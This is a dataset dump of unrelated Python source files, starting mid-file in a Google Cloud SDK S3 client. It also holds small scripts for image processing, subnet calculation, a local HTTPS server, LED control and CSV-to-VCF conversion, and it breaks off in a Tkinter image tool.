'ACL' metadata key.\n kwargs = bucket_resource.metadata['FullACLConfiguration']\n else:\n # Data returned by get_bucket_acl.\n kwargs = {'AccessControlPolicy': bucket_resource.metadata['ACL']}\n kwargs['Bucket'] = bucket_resource.name\n self.client.put_bucket_acl(**kwargs)\n except botocore.exceptions.ClientError as error:\n _raise_if_not_found_error(error, bucket_resource.name)\n # Don't return any ACL information in case the failure affected both\n # metadata keys.\n bucket_resource.metadata.pop('FullACLConfiguration', None)\n bucket_resource.metadata.pop('ACL', None)\n log.error(errors.S3ApiError(error))\n\n patchable_metadata = { # Key -> (client function, function kwargs).\n 'CORSRules': (\n self.client.put_bucket_cors,\n {'CORSConfiguration': {\n 'CORSRules': bucket_resource.metadata.get('CORSRules'),\n }}),\n 'ServerSideEncryptionConfiguration': (\n self.client.put_bucket_encryption,\n {'ServerSideEncryptionConfiguration': bucket_resource.metadata.get(\n 'ServerSideEncryptionConfiguration'),\n }),\n 'LifecycleConfiguration': (\n self.client.put_bucket_lifecycle_configuration,\n {'LifecycleConfiguration': bucket_resource.metadata.get(\n 'LifecycleConfiguration'),\n }),\n 'LoggingEnabled': (\n self.client.put_bucket_logging,\n {'BucketLoggingStatus': {\n 'LoggingEnabled': bucket_resource.metadata.get(\n 'LoggingEnabled'),\n }}),\n 'Payer': (\n self.client.put_bucket_request_payment,\n {'RequestPaymentConfiguration': {\n 'Payer': bucket_resource.metadata.get('Payer'),\n }}),\n 'Versioning': (\n self.client.put_bucket_versioning,\n {'VersioningConfiguration': bucket_resource.metadata.get(\n 'Versioning'),\n }),\n 'Website': (\n self.client.put_bucket_website,\n {'WebsiteConfiguration': bucket_resource.metadata.get('Website')}),\n }\n for metadata_key, (patch_function,\n patch_kwargs) in patchable_metadata.items():\n if metadata_key not in bucket_resource.metadata:\n continue\n\n patch_kwargs['Bucket'] = bucket_resource.name\n try:\n patch_function(**patch_kwargs)\n except botocore.exceptions.ClientError as error:\n _raise_if_not_found_error(error, bucket_resource.name)\n log.error(errors.S3ApiError(error))\n del bucket_resource.metadata[metadata_key]\n\n return 
bucket_resource\n\n def list_buckets(self, fields_scope=cloud_api.FieldsScope.NO_ACL):\n \"\"\"See super class.\"\"\"\n try:\n response = self.client.list_buckets()\n for bucket in response['Buckets']:\n if fields_scope == cloud_api.FieldsScope.FULL:\n yield self.get_bucket(bucket['Name'], fields_scope)\n else:\n yield s3_resource_reference.S3BucketResource(\n storage_url.CloudUrl(\n storage_url.ProviderPrefix.S3, bucket['Name']),\n metadata={'Bucket': bucket, 'Owner': response['Owner']})\n except botocore.exceptions.ClientError as error:\n core_exceptions.reraise(errors.S3ApiError(error))\n\n def list_objects(self,\n bucket_name,\n prefix=None,\n delimiter=None,\n all_versions=False,\n fields_scope=None):\n \"\"\"See super class.\"\"\"\n if all_versions:\n api_method_name = 'list_object_versions'\n objects_key = 'Versions'\n else:\n api_method_name = 'list_objects_v2'\n objects_key = 'Contents'\n try:\n paginator = self.client.get_paginator(api_method_name)\n page_iterator = paginator.paginate(\n Bucket=bucket_name,\n Prefix=prefix if prefix is not None else '',\n Delimiter=delimiter if delimiter is not None else '')\n for page in page_iterator:\n for object_dict in page.get(objects_key, []):\n if fields_scope is cloud_api.FieldsScope.FULL:\n # The metadata present in the list_objects_v2 response or the\n # list_object_versions response is not enough\n # for a FULL scope. Hence, calling the GetObjectMetadata method\n # to get the additonal metadata and ACLs information.\n yield self.get_object_metadata(\n bucket_name=bucket_name,\n object_name=object_dict['Key'],\n generation=object_dict.get('VersionId'),\n fields_scope=fields_scope)\n else:\n yield s3_metadata_util.get_object_resource_from_s3_response(\n object_dict, bucket_name)\n for prefix_dict in page.get('CommonPrefixes', []):\n yield s3_metadata_util.get_prefix_resource_from_s3_response(\n prefix_dict, bucket_name)\n except botocore.exceptions.ClientError as error:\n core_exceptions.reraise(errors.S3ApiError(error))\n\n @_catch_client_error_raise_s3_api_error()\n def copy_object(self,\n source_resource,\n destination_resource,\n request_config,\n progress_callback=None):\n \"\"\"See super class.\"\"\"\n del progress_callback\n\n source_kwargs = {'Bucket': source_resource.storage_url.bucket_name,\n 'Key': source_resource.storage_url.object_name}\n if source_resource.storage_url.generation:\n source_kwargs['VersionId'] = source_resource.storage_url.generation\n\n kwargs = {'Bucket': destination_resource.storage_url.bucket_name,\n 'Key': destination_resource.storage_url.object_name,\n 'CopySource': source_kwargs}\n kwargs.update(\n s3_metadata_util.get_metadata_dict_from_request_config(request_config))\n\n response = self.client.copy_object(**kwargs)\n return s3_metadata_util.get_object_resource_from_s3_response(\n response, kwargs['Bucket'], kwargs['Key'])\n\n # TODO(b/161900052): Implement resumable copies.\n\n def _get_content_encoding(self, resource):\n \"\"\"Returns the ContentEncoding for the resource.\n\n Returns the ContentEncoding if it is already present in the resource object.\n If it is not present, it makes an API call to fetch the object's metadata.\n This might happen if the resource was not created using the head_object\n call, for example, in case of S3Api.list_objects call which is used by the\n WildCardIterator if a wildcard is present.\n\n Args:\n resource (resource_reference.ObjectResource): Resource representing an\n existing object.\n\n Returns:\n A string representing the ContentEncoding for the S3 Object.\n 
\"\"\"\n if resource.metadata:\n content_encoding = resource.metadata.get('ContentEncoding')\n else:\n content_encoding = None\n\n if content_encoding is not None:\n return content_encoding\n\n complete_resource = self.get_object_metadata(resource.bucket, resource.name,\n resource.generation)\n return complete_resource.metadata.get('ContentEncoding')\n\n @_catch_client_error_raise_s3_api_error()\n def download_object(self,\n cloud_resource,\n download_stream,\n decryption_wrapper=None,\n digesters=None,\n do_not_decompress=False,\n download_strategy=cloud_api.DownloadStrategy.ONE_SHOT,\n progress_callback=None,\n start_byte=0,\n end_byte=None):\n \"\"\"See super class.\"\"\"\n extra_args = {}\n if cloud_resource.generation:\n extra_args['VersionId'] = cloud_resource.generation\n\n if download_strategy == cloud_api.DownloadStrategy.RESUMABLE:\n response = self.client.get_object(\n Bucket=cloud_resource.bucket,\n Key=cloud_resource.name,\n Range='bytes={}-'.format(start_byte),\n )\n processed_bytes = start_byte\n for chunk in response['Body'].iter_chunks(\n scaled_integer.ParseInteger(\n properties.VALUES.storage.download_chunk_size.Get())):\n download_stream.write(chunk)\n processed_bytes += len(chunk)\n if progress_callback:\n progress_callback(processed_bytes)\n else:\n # TODO(b/172480278) Conditionally call get_object for smaller object.\n self.client.download_fileobj(\n cloud_resource.bucket,\n cloud_resource.name,\n download_stream,\n Callback=progress_callback,\n ExtraArgs=extra_args)\n\n # Download callback doesn't give us streaming data, so we have to\n # read whole downloaded file to update digests.\n if digesters:\n with files.BinaryFileReader(\n download_stream.name) as completed_download_stream:\n completed_download_stream.seek(0)\n for hash_algorithm in digesters:\n digesters[hash_algorithm] = hash_util.get_hash_from_file_stream(\n completed_download_stream, hash_algorithm)\n\n return self._get_content_encoding(cloud_resource)\n\n # TODO(b/161437901): Handle resumed download.\n # TODO(b/161460749): Handle download retries.\n\n @_catch_client_error_raise_s3_api_error()\n def delete_object(self, object_url, request_config):\n \"\"\"See super class.\"\"\"\n del request_config # Unused.\n\n delete_object_kwargs = {\n 'Bucket': object_url.bucket_name,\n 'Key': object_url.object_name,\n }\n if object_url.generation:\n delete_object_kwargs['VersionId'] = object_url.generation\n return self.client.delete_object(**delete_object_kwargs)\n\n @_catch_client_error_raise_s3_api_error()\n def get_object_metadata(self,\n bucket_name,\n object_name,\n generation=None,\n fields_scope=None):\n \"\"\"See super class.\"\"\"\n request = {'Bucket': bucket_name, 'Key': object_name}\n\n # The VersionId keyword argument to head_object is not nullable if it is\n # present, so only include it in the function call if it has a value.\n if generation is not None:\n request['VersionId'] = generation\n\n try:\n object_dict = self.client.head_object(**request)\n except botocore.exceptions.ClientError as e:\n _raise_if_not_found_error(\n e,\n storage_url.CloudUrl(storage_url.ProviderPrefix.S3, bucket_name,\n object_name, generation).url_string)\n raise e\n\n # User requested ACL's with FieldsScope.FULL.\n if fields_scope is cloud_api.FieldsScope.FULL:\n try:\n acl_response = self.client.get_object_acl(**request)\n acl_response.pop('ResponseMetadata', None)\n object_dict['ACL'] = acl_response\n except botocore.exceptions.ClientError as error:\n object_dict['ACL'] = errors.S3ApiError(error)\n\n return 
s3_metadata_util.get_object_resource_from_s3_response(\n        object_dict, bucket_name, object_name)\n\n  def _upload_using_managed_transfer_utility(self, source_stream,\n                                             destination_resource, extra_args):\n    \"\"\"Uploads the data using boto3's managed transfer utility.\n\n    Calls the upload_fileobj method which performs multi-threaded multipart\n    upload automatically. Performs slightly better than put_object API method.\n    However, upload_fileobj cannot perform data integrity checks and we have\n    to use put_object method in such cases.\n\n    Args:\n      source_stream (a file-like object): A file-like object to upload. At a\n        minimum, it must implement the read method, and must return bytes.\n      destination_resource (resource_reference.ObjectResource|UnknownResource):\n        Represents the metadata for the destination object.\n      extra_args (dict): Extra arguments that may be passed to the client\n        operation.\n\n    Returns:\n      resource_reference.ObjectResource with uploaded object's metadata.\n    \"\"\"\n    bucket_name = destination_resource.storage_url.bucket_name\n    object_name = destination_resource.storage_url.object_name\n    self.client.upload_fileobj(\n        Fileobj=source_stream,\n        Bucket=bucket_name,\n        Key=object_name,\n        ExtraArgs=extra_args)\n    return self.get_object_metadata(bucket_name, object_name)\n\n  def _upload_using_put_object(self, source_stream, destination_resource,\n                               extra_args):\n    \"\"\"Uploads the source stream using the put_object API method.\n\n    Args:\n      source_stream (a seekable file-like object): The stream of bytes to be\n        uploaded.\n      destination_resource (resource_reference.ObjectResource|UnknownResource):\n        Represents the metadata for the destination object.\n      extra_args (dict): Extra arguments that may be passed to the client\n        operation.\n\n    Returns:\n      resource_reference.ObjectResource with uploaded object's metadata.\n    \"\"\"\n    kwargs = {\n        'Bucket': destination_resource.storage_url.bucket_name,\n        'Key': destination_resource.storage_url.object_name,\n        'Body': source_stream,\n    }\n    kwargs.update(extra_args)\n    response = self.client.put_object(**kwargs)\n    return s3_metadata_util.get_object_resource_from_s3_response(\n        response, destination_resource.storage_url.bucket_name,\n        destination_resource.storage_url.object_name)\n\n  @_catch_client_error_raise_s3_api_error()\n  def upload_object(self,\n                    source_stream,\n                    destination_resource,\n                    request_config,\n                    serialization_data=None,\n                    tracker_callback=None,\n                    upload_strategy=cloud_api.UploadStrategy.SIMPLE):\n    \"\"\"See super class.\"\"\"\n    del serialization_data, tracker_callback\n\n    if upload_strategy != cloud_api.UploadStrategy.SIMPLE:\n      raise command_errors.Error(\n          'Invalid upload strategy: {}.'.format(upload_strategy.value))\n\n    # All fields common to both put_object and upload_fileobj are added\n    # to the extra_args dict.\n    extra_args = s3_metadata_util.get_metadata_dict_from_request_config(\n        request_config)\n\n    if request_config.md5_hash:\n      # The upload_fileobj method can perform multipart uploads, so it cannot\n      # validate with user-provided MD5 hashes. Hence we use the put_object API\n      # method if MD5 validation is requested.\n      if request_config.size > MAX_PUT_OBJECT_SIZE:\n        raise errors.S3ApiError(\n            'Cannot upload to destination: {url} because MD5 validation can'\n            ' only be performed for file size <= {maxsize} Bytes. Current file'\n            ' size is {filesize} Bytes. 
You can remove the MD5 validation'\n            ' requirement to complete the upload'.format(\n                url=destination_resource.storage_url.url_string,\n                maxsize=MAX_PUT_OBJECT_SIZE,\n                filesize=request_config.size))\n\n      return self._upload_using_put_object(source_stream, destination_resource,\n                                           extra_args)\n    else:\n      # We default to calling the upload_fileobj method provided by boto3 which\n      # is a managed-transfer utility that can perform multipart uploads\n      # automatically. It can be used for non-seekable source_streams as well.\n      return self._upload_using_managed_transfer_utility(\n          source_stream, destination_resource, extra_args)\n","sub_path":"google-cloud-sdk/lib/googlecloudsdk/api_lib/storage/s3_api.py","file_name":"s3_api.py","file_ext":"py","file_size_in_byte":23123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"344851699","text":"import numpy as np\r\nimport json\r\nimport matplotlib.pyplot as plt\r\nfrom model import AlexNet\r\nfrom PIL import Image\r\n\r\nimport keras.backend.tensorflow_backend as KTF\r\nimport tensorflow as tf\r\nconfig=tf.compat.v1.ConfigProto()\r\nconfig.gpu_options.allow_growth=True # do not grab all GPU memory up front; allocate on demand\r\nconfig.gpu_options.per_process_gpu_memory_fraction=0.6 # cap the fraction of GPU memory this process may use\r\nsess=tf.compat.v1.Session(config=config)\r\n\r\nim_height = 224\r\nim_width = 224\r\nimg = Image.open(\"./rose.jpg\")\r\nimg = img.resize((im_height, im_width))\r\nplt.imshow(img)\r\n\r\nimg = np.array(img) / 255\r\nimg = (np.expand_dims(img, 0))\r\n\r\ntry:\r\n    json_file = open(\"./class_indices.json\", \"r\")\r\n    class_indict = json.load(json_file)\r\nexcept Exception as e:\r\n    print(e)\r\n    exit(-1)\r\n\r\nmodel = AlexNet(class_num=5)\r\nmodel.load_weights(\"./save_weights/myAlex.h5\")\r\nresult = model.predict(img)  # the prediction keeps the batch dimension, e.g. [[0.06769567 0.0463397  0.46235803 0.0457924  0.37781426]]\r\npredict_class = np.squeeze(result)  # drop the batch dimension\r\npredict_class = np.argmax(predict_class)\r\nprint(class_indict[str(predict_class)], result[0][predict_class])\r\nplt.show()\r\n","sub_path":"Tensorflow实现AlexNet/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"440692709","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef load_img():\n    img = np.zeros((600, 600))\n    font = cv2.FONT_HERSHEY_SIMPLEX\n    cv2.putText(img, text='HELLO', org=(50, 300),\n                fontFace=font, fontScale=5,\n                color=(255, 255, 255), thickness=26)\n    return img\n\n\ndef display_img(img):  # add **args to the function so it can plot more than one image\n    fig = plt.figure(figsize=(12, 10))\n    ax = fig.add_subplot(111)\n    ax.imshow(img, cmap='gray')\n    plt.show()\n\nimg = load_img()\ndisplay_img(img)\n\nkernel = np.ones((5, 5), dtype=np.uint8)\nkernel\n# -----\n# Erosion\nres = cv2.erode(img, kernel, iterations=6)\ndisplay_img(res)\n\nimg = load_img()\n# creating white noise\nw_noise = np.random.randint(low=0, high=2, size=(600, 600))\nw_noise\ndisplay_img(w_noise)\n\nimg.max()\n\nw_noise = w_noise * 255\nw_noise\ndisplay_img(w_noise)\n\nimg_noise = w_noise + img\ndisplay_img(img_noise)\n\n# ------\n# applying the opening morphology (erosion + dilation)\nopening = cv2.morphologyEx(img_noise, cv2.MORPH_OPEN, kernel)\ndisplay_img(opening)\n\nimg = load_img()\n\n# using opening on an image with black noise\n## preparing the black noise (white noise inside the letter)\nb_noise = np.random.randint(low=0, high=2, size=(600, 600))\nb_noise 
= b_noise * -255\n\nb_noise_img = img + b_noise\nb_noise_img[b_noise_img == -255] = 0\ndisplay_img(b_noise_img)\nb_noise_img.max()\n\n## applying the closing morphology\nclosing = cv2.morphologyEx(b_noise_img, cv2.MORPH_CLOSE, kernel)\ndisplay_img(closing)\ndisplay_img(img)\n\nimg = load_img()\n\n## applying the gradient morphology (Erosion - Dilation)\ngradient = cv2.morphologyEx(img, cv2.MORPH_GRADIENT, kernel)\n\ndisplay_img(gradient)","sub_path":"Computer Vision/Aula2-VisãoComputacional/09-Morphological.py","file_name":"09-Morphological.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"518093658","text":"import io\nimport os\n\nfrom google.cloud import vision\nfrom google.cloud.vision import types\n\nimgPath = \"assets/bookshelf_test.jpg\"\n\ndef detect_text(path):\n    \"\"\"Detects text in the file.\"\"\"\n    client = vision.ImageAnnotatorClient()\n\n    with io.open(path, 'rb') as image_file:\n        content = image_file.read()\n\n    image = vision.types.Image(content=content)\n\n    #response = client.text_detection(image=image)\n    objects = client.object_localization(image=image).localized_object_annotations\n    #texts = response.text_annotations\n    #print('Texts:')\n\n    #textList = []\n\n    #count = 0\n\n    print('Number of objects found: {}'.format(len(objects)))\n    for object_ in objects:\n        print('\\n{} (confidence: {})'.format(object_.name, object_.score))\n        print('Normalized bounding polygon vertices: ')\n        for vertex in object_.bounding_poly.normalized_vertices:\n            print(' - ({}, {})'.format(vertex.x, vertex.y))\n\n    # for text in texts:\n    #     print(count)\n    #     #count += 1\n    #     #rint('\\n\"{}\"'.format(text.description))\n    #     textList.append(text.description)\n\n    # for name in textList:\n    #     print(name)\n\n\ndetect_text(imgPath)\n \n\n\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"622111060","text":"import matplotlib.pyplot as plt\nfrom matplotlib.finance import quotes_historical_yahoo, candlestick\nimport unittest\n\nclass TestCandleStick(unittest.TestCase):\n    def setUp(self):\n        date1 = ( 2014, 2, 1)\n        date2 = ( 2014, 4, 12 )\n        quotes = quotes_historical_yahoo('INTC', date1, date2)\n\n        if len(quotes) == 0:\n            raise SystemExit\n\n        fig, ax = plt.subplots()\n        fig.subplots_adjust(bottom=0.2)\n        #plot_day_summary(ax, quotes, ticksize=3)\n        self.s = candlestick(ax, quotes, width=0.6)\n\n    def test_zorder1(self):\n        self.assertEqual(self.s[0][0].zorder, self.s[1][0].zorder-1)\n\n    def test_zorder2(self):\n        self.assertEqual(self.s[0][0].zorder, self.s[1][0].zorder-1)\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"A2/tests/test_candlestickShadow.py","file_name":"test_candlestickShadow.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"376260833","text":"def quicksort(array):\n    if len(array) < 2:\n        return array\n    else:\n        pivot = array[0]\n        less = [i for i in array[1:] if i <= pivot]\n        greater = [i for i in array[1:] if i > pivot]\n        return quicksort(less) + [pivot] + quicksort(greater)\n# print quicksort([10, 5, 2, 4])\n\ndef multip(arr):\n    for i in range(len(arr)):\n        print(arr[i])\n    # print newArr\n\n\nmultip([2, 3, 7, 8, 
10])","sub_path":"quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"591475447","text":"import time\nimport machine\nfrom micropython import mem_info\n\nprint(\"main.py running:\")\nmem_info()\n\nmsg = None\ntry:\n    from machine import UART #not yet available on ESP32 port!\n    print(\"Waiting for connection on UART 0...\",end=\"\")\n    time.sleep(1.0)\n\n    uart = machine.UART(0, 115200)# init with given baudrate\n\n    uart.init(115200, bits=8, parity=None, stop=1, timeout=1000) # init with given parameters\n    msg = uart.read(1)\nexcept ImportError:\n    pass\n\nif msg is None:\n    print(\"timed out.\")\n    print(\"Loading poly_app\")\n    import poly_app\nelse:\n    print(msg)\n    print(\"Rerouting to REPL\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"586955119","text":"#It is necessary to import from Subnet.py\n#otherwise it will not work\nfrom Subnetm import divide,clase,transform_bits2,binarySum\n\n#bubbleSort inverted\ndef sort(arr,pos):\n    long=len(arr)\n    while long>1:\n        for x in range(long):\n            y=x+1\n            if(y<long):\n                if(arr[x]<arr[y]):\n                    arr[x],arr[y]=arr[y],arr[x]\n                    pos[x],pos[y]=pos[y],pos[x]\n        long-=1\n\n#Transforms the ip into binary form and gets its class\ndef convert(ip):\n    binary=divide(ip)\n    cl=clase(ip)\n    return binary,cl\n\n#Calculates the amount of bits needed for the hosts\ndef calculateSize(size,bits):\n    res=2\n    done=False\n    while(not(done)):\n        if(res>size):\n            return \"Error; Not enough space to subnet\"\n        if(2**res>size):\n            done=True\n        else:\n            res+=1\n    return res\n\n#Creates the string for the broadcast of that subnet\ndef broad(quantity):\n    res=\"\"\n    for x in range(len(quantity)):\n        res+='1'\n    return res\n\n#creates all the different combinations for the subnets\n#IP,hosts,broadcast\ndef permut(noTouch,net,id,first,last,broad):\n    always=noTouch+net\n    ip=transform_bits2(always+id)\n    fhost=transform_bits2(always+first)\n    lhost=transform_bits2(always+last)\n    broadcast=transform_bits2(always+broad)\n    return [ip,fhost,lhost,broadcast]\n\n#creates the mask for the Subnet using the bits dedicated for the hosts\ndef mask(host):\n    mask=\"\"\n    for x in range(32-host):\n        mask+='1'\n    for x in range(host):\n        mask+='0'\n    return transform_bits2(mask)\n\n#module that makes the actual subnetting\ndef root(ip,bits,unmut,large):\n    unmutable=ip[:unmut]\n    hostBit=calculateSize(large,bits)\n    netBits=32-hostBit\n    network=ip[unmut:netBits]\n    ipnet=ip[netBits:]\n    fhost=binarySum(ipnet,1)\n    broadcast=broad(ipnet)\n    lhost=binarySum(broadcast,-1)\n    result=permut(unmutable,network,ipnet,fhost,lhost,broadcast)\n    next=binarySum((unmutable+network+broadcast),1)\n    result.append(mask(hostBit))\n    result.append(netBits)\n    return result,next\n\n#exports everything into a .txt for later analysis\ndef export(dictionary):\n    writer=open(\"VLSM.txt\",\"w\")\n\n    writer.write('\\n')\n    arr=dictionary[1]\n    writer.write(\"The next subnets are for the ip: \"+arr[0]+\"\\n\\n\")\n\n    for x in range(1,len(dictionary)+1):\n        string=\"The subnet number \"+str(x)+\":\"\n        writer.write(string+\"\\n\")\n        arr=dictionary[x]\n        string=\"The available hosts in this subnet are:\\t\"+str(arr[6])\n        writer.write(string+\"\\n\")\n        string=\"Sub_ip= \"+arr[0]+\" \\tHosts= \"+arr[1]+\" - \"+arr[2]+\" \\tBroadcast= \"+arr[3]\n        writer.write(string+\"\\n\" )\n        string=\"The Subnet mask in decimal form is: \"+str(arr[5])+\"\\t, the subnet mask is: \"+arr[4]\n        writer.write(string+\"\\n\\n\")\n\n\n    writer.close()\n\n#Mastermind for the code\n#Receives the parameters and then creates the dictionary\n#where everything is saved for later exportation\ndef vlsm(ipi,dump):\n    num=[]\n    sub=[]\n    i=0\n    for x in dump:\n        if(not(x in sub)):\n            sub.append(x)\n            
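#num keeps a parallel counter for each distinct host amount stored in sub\n            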
num.append(0)\n for x in sub:\n for y in dump:\n if(x==y):\n num[i]+=1\n i+=1\n if(len(sub)!=len(num)):\n print(\"Error\")\n return \"Error\"\n origin,cl=convert(ipi)\n sort(sub,num)\n unmutBits=8*cl\n usebits=32-unmutBits\n dict={}\n cont=1\n for x in range(len(sub)):\n for y in range(num[x]):\n result,origin=root(origin,usebits,unmutBits,sub[x])\n result.append(sub[x])\n dict[cont]=result\n cont+=1\n #export(dict)\n print(\"\\n\")\n for x in dict:\n arr=dict[x]\n print(\"The subnet number \"+str(x)+\":\\n\")\n print(\"The available hosts in this subnet are:\\n\"+str(arr[6])+\"\\n\")\n print(\"Sub_ip= \"+arr[0]+\" \\nHosts= \"+arr[1]+\" - \"+arr[2]+\" \\nBroadcast= \"+arr[3]+\"\\n\")\n print(\"The Subnet mask in decimal form is: \"+str(arr[5])+\"\\n, the subnet mask is: \"+arr[4]+\"\\n\\n\")\n\ndef inip():\n done=False\n while(not(done)):\n ip=input(\"What will the ip be? = \")\n if(type(divide(ip))!=str):\n done=True\n else:\n print(\"There is a problem with the ip you just gave me, try again\\n\")\n return ip\n\ndef multIn(string,arr):\n num=\"\"\n times=\"\"\n change=False\n for x in string:\n if(x!='x' and x!='*'):\n if(change):\n times+=x\n else:\n num+=x\n else:\n change=True\n num=int(num)\n times=int(times)\n for x in range(times):\n arr.append(num)\n\ndef inHost():\n sub=[]\n done=False\n while(not(done)):\n accept=True\n try:\n i=input(\"How many hosts? (type 'go' to run the algorithm) \")\n if(i==\"go\"):\n done=True\n elif('x' in i or '*' in i):\n multIn(i,sub)\n accept=False\n else:\n i=int(i)\n except ValueError:\n print(\"There has been an error with the number you introduced, try again\\n\")\n accept=False\n if(accept and not(done)):\n sub.append(i)\n return sub\n\ndef mainV():\n ip=inip()\n sub=inHost()\n vlsm(ip,sub)\n","sub_path":"toMobile/VLSMm.py","file_name":"VLSMm.py","file_ext":"py","file_size_in_byte":5506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"560426863","text":"# Built-in modules\nfrom http import server\nimport ssl\n\n# Project modules\nfrom . import create_localhost_cert\nfrom ..localhttp.apirequesthandler import APIRequestHandler\nfrom ..localhttp.localserver import LocalServerHTTP\nfrom ..logger import Logger\n\n\n\nclass LocalServerHTTPS( LocalServerHTTP ):\n\n\n\tdef __init__( self, port, certfile, keyfile ):\n\t\t\"\"\"\n\t\tParameters\n\t\t----------\n\t\tport : int\n\t\t\tPort to run the local server on.\n\t\tcertfile : str\n\t\tkeyfile : str\n\t\t\"\"\"\n\n\t\tself.httpd = None\n\n\t\tif not certfile or not keyfile:\n\t\t\tcertfile, keyfile = create_localhost_cert()\n\n\t\tif not certfile or not keyfile:\n\t\t\tLogger.error( '[LocalServerHTTPS.__init__] No certfile and/or no keyfile. Cannot start HTTPS server.' )\n\t\t\treturn\n\n\t\tif hasattr( server, 'ThreadingHTTPServer' ):\n\t\t\tself.httpd = server.ThreadingHTTPServer( ( '', port ), APIRequestHandler )\n\t\telse:\n\t\t\tLogger.warn(\n\t\t\t\t'http.server.ThreadingHTTPServer not available. '\n\t\t\t\t'Using fallback to http.server.HTTPServer instead.'\n\t\t\t)\n\t\t\tself.httpd = server.HTTPServer( ( '', port ), APIRequestHandler )\n\n\t\tself.httpd.socket = ssl.wrap_socket(\n\t\t\tself.httpd.socket,\n\t\t\tcertfile = certfile,\n\t\t\tkeyfile = keyfile,\n\t\t\tserver_side = True\n\t\t)\n\n\n\tdef start( self ):\n\t\t\"\"\" Start the local server. \"\"\"\n\n\t\tif not self.httpd:\n\t\t\tLogger.error( '[LocalServerHTTPS.start] No HTTPS server running. Exiting.' 
)\n\t\t\treturn\n\n\t\tprint( 'A local HTTPS server will be available under: https://127.0.0.1:%d' % self.httpd.server_port )\n\t\tprint( '----------' )\n\n\t\ttry:\n\t\t\tself.httpd.serve_forever()\n\t\texcept KeyboardInterrupt:\n\t\t\tprint( '\\n----------' )\n\t\t\tLogger.info( 'Application has been terminated by user.' )\n","sub_path":"imitateapi/localhttps/localserver.py","file_name":"localserver.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"285168685","text":"import machine, neopixel\nfrom math import *\n\nnbLedRing = 20\nring = neopixel.NeoPixel(machine.Pin(22), nbLedRing)\nlum = 1\n\ndef rvbLum(r, v, b):\n    return (int(lum*r), int(lum*v), int(lum*b))\n\n\n\ndef computeLedLevel( nb_dsp_led, led_num, dsp_level, tol ):\n    led_val = 0.0 # Nominal value of the computed led num\n    vt = 0.0 # Value of the tolerance (between led_val)\n    dt_vt = 0.0 # Difference between led_val and dsp_level\n    outputLevel = 0\n\n    led_step = round(255 / nb_dsp_led)\n    led_val = led_step * led_num # Nominal value\n    vt = round( led_step * tol) # Tolerance value between led_val: => led_val +/- vt\n    dt_vt = ( led_val - dsp_level)\n    dt_vt = abs (dt_vt) # abs of the difference (we ignore the sign)\n    dt_vt = vt -dt_vt # Subtract the value of the tolerance\n    if (dt_vt > 0):\n        outputLevel = dt_vt /vt; \n    return (outputLevel)\n\n\ndef setRing(level):\n    for led in range(0, nbLedRing):\n        val = computeLedLevel(nbLedRing, led, level, 2.0) * 255\n        ring[led] = rvbLum(val, val, val)\n    ring.write()\n","sub_path":"ledDrive.py","file_name":"ledDrive.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"55289744","text":"__author__ = 'Krishna Ajjarapu'\r\nimport sys\r\nimport csv\r\n\r\n\r\n#Assume file format as Firstname,Lastname,Contact,Email,Organization\r\n#Convert a \"comma separated values\" file to vcf contact cards\r\n\r\ndef convert_to_vcf(filename):\r\n\r\n    \r\n    source = open(filename,'r')\r\n    dest = open('Contacts_PythonBatch_9.vcf','w')\r\n    reader = csv.reader( source )\r\n    n=0\r\n    for row in reader:\r\n        dest.write('BEGIN:VCARD' + '\\n')\r\n        dest.write( 'N:' + row[0] + ';' + row[1] + \"\\n\")\r\n        dest.write('TEL;CELL: '+ row[2] + '\\n')\r\n        dest.write('EMAIL: '+ row[3] + '\\n')\r\n        dest.write('ORG: '+ row[4] + '\\n')\r\n        dest.write('END:VCARD' + '\\n')\r\n        dest.write('\\n')\r\n        \r\n        n+=1 # Count for number of contacts\r\n    dest.close()\r\n    print(\"Total number of contacts converted to vcf are: {0}\".format(n))\r\n\r\ndef main(args):\r\n    if len(args)!=2:\r\n        print(\"Usage:\\n\")\r\n        print(\"{0} filename\".format(args[0]))\r\n        return\r\n    convert_to_vcf(args[1])\r\n    \r\nif __name__==\"__main__\":\r\n    main(sys.argv)","sub_path":"11-ConvertToVCF.py","file_name":"11-ConvertToVCF.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"405811577","text":"from tkinter import *\nfrom PIL import Image\nimport tkinter.filedialog\n\n\ndef onOpen():\n    filetypes = [('All files', '*')]\n    dlg = tkinter.filedialog.Open(filetypes=filetypes)\n    fl = dlg.show()\n\n    if fl !='':\n        img = Image.open(fl)\n        img = img.convert(\"L\")\n        img.show()\n\n\nroot = Tk()\nroot.title(\"Black & White\")\nroot.geometry(\"300x50\")\nroot.resizable(False, False)\n\nwindowWidth = root.winfo_reqwidth()\nwindowHeight = root.winfo_reqheight()\nprint(\"Width\", windowWidth, 
